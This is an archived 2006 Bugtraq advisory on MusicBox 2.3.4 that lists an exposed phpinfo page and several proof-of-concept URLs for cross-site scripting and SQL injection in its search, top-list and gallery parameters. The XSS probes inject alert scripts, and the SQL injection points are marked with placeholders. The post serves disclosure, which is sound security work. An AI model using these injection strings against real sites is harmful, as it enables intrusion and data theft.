Bugtraq mailing list archives
MusicBox <= 2.3.4 XSS SQL injection Vulnerability
From: securityconnection () gmail com
Date: 24 Jul 2006 16:00:16 -0000
MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org
Current thread:
- MusicBox <= 2.3.4 XSS SQL injection Vulnerability securityconnection (Jul 24)